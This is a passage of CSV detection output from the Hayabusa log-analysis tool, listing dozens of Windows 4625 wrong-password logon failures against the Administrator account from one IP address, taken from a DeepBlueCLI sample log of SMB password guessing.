+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGpD7AJUTekDmd6Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.423 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OykzTOn7B9THv0cT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.462 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cIYOrBBwX8nFpCzw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.508 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SvnROHLMVnmPfAyy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.547 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5EwJ84H7kXQXzGZz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34RLeLWDgLayU3JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.619 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QaXHGUgboODAi5Qu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.659 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlOlZ0m397CsmaeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.699 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N24rSPCI8DsQIPXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.738 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5y2tgoUcs6mFPZm4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.776 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HmFX6MioYqaMumgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.820 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R4HRWlPWPKy1Cicq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.869 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GDUf7wVbHkS9uaPC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.917 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eBX0Lviz6Bv5rGcb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:10.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zZwPm9qahLU78FRY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jOVsopykTHNQcYUp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.060 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n8DY7sdDY8nuWdME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.105 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTxEVu7mudXEBARZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.148 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ohqvCoOLkFRcqvE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: me8rikVJqcKxvHdq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.228 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLqVmqCmHTrD7V8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.269 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ySdyzxvDasHgjq0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.312 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N2auwOc1wemq76n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.348 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgK6lHgC5WOBk4kW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.389 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2GG0bKgusKqseQij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpHm7DcOmhq4rkaX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.468 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OX1vVGrE7fJSMEiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.508 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65i7wtyAhL58QrzC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.551 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k8uSVFRTLTB6g1eg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.592 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ire6VOUMWZQnNjES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.629 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGWnvKUXnbJvRqql | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.666 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBVvrrLf1rnAviKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.704 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NE9atGNBlSLQLLcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.744 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a0M5EaAXziu07hOH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.784 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PM1mwxqI7yVgoK2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.836 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPqnpvetHXdThxYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.879 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gthbVQMJ7UD2QS7H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:11.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwwJXCoC3gMDoDn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.068 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ilNNoVbZpyhtsNkV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.109 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eNY0lv9IglfHP34d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.167 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjSeQciwy17L7raV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.208 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wycE1fIsmPq9zaMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.241 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5z1spxImm2ZlGOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.294 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dg7o4GCET1bJrlEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.376 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E7Db3OLA0XPXL1B4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.417 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uoqx5iPRp2tfYYos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.448 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ixw5XWC2frtrTUkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.495 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3v0NpzAp7io9gbZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.536 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AfOOiR2zO5xem9Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.582 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yiGtitRqZbGNKrtN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.623 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oQ70LvSMnGxBCFO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.660 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGHr8623vHZyMY5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.707 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X5Y1C9A4XqxQGoVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.745 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SOnirLGOZzRVSt3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.772 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jLu7XtYCHPqVNE7u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.811 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w242Ei1CpWErEE4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.847 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UOZUagVG4R6zcK92 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.891 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hQOl8XV3Ydp8UcW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.927 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1XBRDfoN0I2iu6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.963 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngyknhk7uGvs38bG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:12.996 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXZUhLVsfRUBDcsu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.045 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VEDAtkhiSqUcLj2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.088 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4CmH02M91kHzeK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.125 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5St1kWrKP4PZlOIy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.156 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17A6k4Om84gunQfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.195 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9GfR4XdixrNJHny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.236 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 27JWPfEV4DgS1tNv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.280 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yNeJnXg1pyedSpqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.324 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WWihv14n9IAQXw2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.364 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gy19bFWzQFaQZRBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.412 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N28Ec4jkXkSNvsQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.447 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sD9qQWJbeukyPQbc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.487 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uoRSHXvwMeKg8cyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.528 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPEOhloL7vo1fTFQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.564 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: glbLglffka5JqQCN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.612 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7MTbgvYN6PIaKxeK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.652 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAjWfgmGrm3o2mAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:13.683 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9EZYPG6uQtsez1UI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 